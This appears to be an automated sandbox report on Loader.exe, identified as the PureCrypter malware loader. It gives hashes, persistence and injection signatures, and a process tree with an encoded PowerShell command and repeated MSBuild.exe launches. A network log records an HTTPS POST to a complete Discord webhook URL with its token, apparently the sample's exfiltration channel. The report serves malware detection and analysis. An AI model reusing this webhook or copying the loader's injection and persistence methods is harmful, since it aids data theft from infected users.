Analysis

  • max time kernel
    47s
  • max time network
    50s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    03/02/2023, 18:58 UTC

General

  • Target

    Loader.exe

  • Size

    1.6MB

  • MD5

    a44e526804469076d712e8a05ddd7759

  • SHA1

    7010fda540e70139020a7a79730e74e99bd8e6c9

  • SHA256

    46d7128963bde013c8ec359b285e47eabbf9c88e332735e02ced518773e8e95f

  • SHA512

    04c40ef00c80d641c4f7bced8aefc180d695ea23ef79e272167f1a567484be2ab7031ca55a246cbeba1ed0c0ed93223fc2a33daed7f2048c62f169f0e6325b36

  • SSDEEP

    49152:fBvdZG5o8InNXL9Qn0HpZjI64n2hcyfT2:pFZG5oNnRfh9

Malware Config

Signatures

  • Detect PureCrypter injector 1 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • PureCrypter

    PureCrypter is a .NET malware loader first seen in early 2021.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:364
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAyAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1104
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      2⤵
        PID:1776
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
        2⤵
          PID:588
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
          2⤵
            PID:1652
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
            2⤵
              PID:1064
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
              2⤵
                PID:580
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                2⤵
                  PID:1724
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                  2⤵
                    PID:1772
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                    2⤵
                      PID:932
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                      2⤵
                        PID:1492
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                        2⤵
                          PID:888

                      Network

                      • flag-us
                        DNS
                        ptb.discord.com
                        Loader.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        ptb.discord.com
                        IN A
                        Response
                        ptb.discord.com
                        IN A
                        162.159.128.233
                        ptb.discord.com
                        IN A
                        162.159.135.232
                        ptb.discord.com
                        IN A
                        162.159.138.232
                        ptb.discord.com
                        IN A
                        162.159.137.232
                        ptb.discord.com
                        IN A
                        162.159.136.232
                      • flag-us
                        POST
                        https://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy
                        Loader.exe
                        Remote address:
                        162.159.128.233:443
                        Request
                        POST /api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: ptb.discord.com
                        Content-Length: 202
                        Expect: 100-continue
                        Connection: Keep-Alive
                        Response
                        HTTP/1.1 204 No Content
                        Date: Fri, 03 Feb 2023 19:01:14 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: keep-alive
                        set-cookie: __dcfduid=216b8ec0a3f511ed8e2022b34b66156a; Expires=Wed, 02-Feb-2028 19:01:14 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                        x-ratelimit-limit: 5
                        x-ratelimit-remaining: 4
                        x-ratelimit-reset: 1675450875
                        x-ratelimit-reset-after: 1
                        Via: 1.1 google
                        Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5HDV0Gj5YpoR6%2FJGLQYLMgX65zbEIC1Phax524jgnDqiNo5ZMV%2FjRnmzYvJVq9SvimkXr%2BaGYhrms1q5pgKO8rE7NRHIKGxgjdxpQv%2BmEwsbkZihIJlXnezrw2%2FLTjxMLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Content-Type-Options: nosniff
                        Set-Cookie: __sdcfduid=216b8ec0a3f511ed8e2022b34b66156a533a721b4e4ddd865171029e1827a5077967b578e710f0c99783e184c5e8c53b; Expires=Wed, 02-Feb-2028 19:01:14 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                        Set-Cookie: __cfruid=06bf2a3f5434bc90b1b64641c8329bcbf8c6f723-1675450874; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 793d69f9fb350ead-AMS
                      • 162.159.128.233:443
                        https://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy
                        tls, http
                        Loader.exe
                        1.2kB
                        4.4kB
                        9
                        9

                        HTTP Request

                        POST https://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy

                        HTTP Response

                        204
                      • 8.8.8.8:53
                        ptb.discord.com
                        dns
                        Loader.exe
                        61 B
                        141 B
                        1
                        1

                        DNS Request

                        ptb.discord.com

                        DNS Response

                        162.159.128.233
                        162.159.135.232
                        162.159.138.232
                        162.159.137.232
                        162.159.136.232

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • memory/364-54-0x00000000008B0000-0x0000000000A52000-memory.dmp

                        Filesize

                        1.6MB

                      • memory/364-55-0x000000001BF40000-0x000000001C218000-memory.dmp

                        Filesize

                        2.8MB

                      • memory/364-67-0x000000001BEC7000-0x000000001BEE6000-memory.dmp

                        Filesize

                        124KB

                      • memory/364-66-0x000000001C220000-0x000000001C2DC000-memory.dmp

                        Filesize

                        752KB

                      • memory/364-58-0x000000001BEC7000-0x000000001BEE6000-memory.dmp

                        Filesize

                        124KB

                      • memory/1104-60-0x000007FEEB530000-0x000007FEEC08D000-memory.dmp

                        Filesize

                        11.4MB

                      • memory/1104-59-0x000007FEEC090000-0x000007FEECAB3000-memory.dmp

                        Filesize

                        10.1MB

                      • memory/1104-61-0x00000000029D4000-0x00000000029D7000-memory.dmp

                        Filesize

                        12KB

                      • memory/1104-62-0x000000001B950000-0x000000001BC4F000-memory.dmp

                        Filesize

                        3.0MB

                      • memory/1104-63-0x00000000029DB000-0x00000000029FA000-memory.dmp

                        Filesize

                        124KB

                      • memory/1104-64-0x00000000029D4000-0x00000000029D7000-memory.dmp

                        Filesize

                        12KB

                      • memory/1104-65-0x00000000029DB000-0x00000000029FA000-memory.dmp

                        Filesize

                        124KB

                      • memory/1104-57-0x000007FEFB6B1000-0x000007FEFB6B3000-memory.dmp

                        Filesize

                        8KB

                      We care about your privacy.

                      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.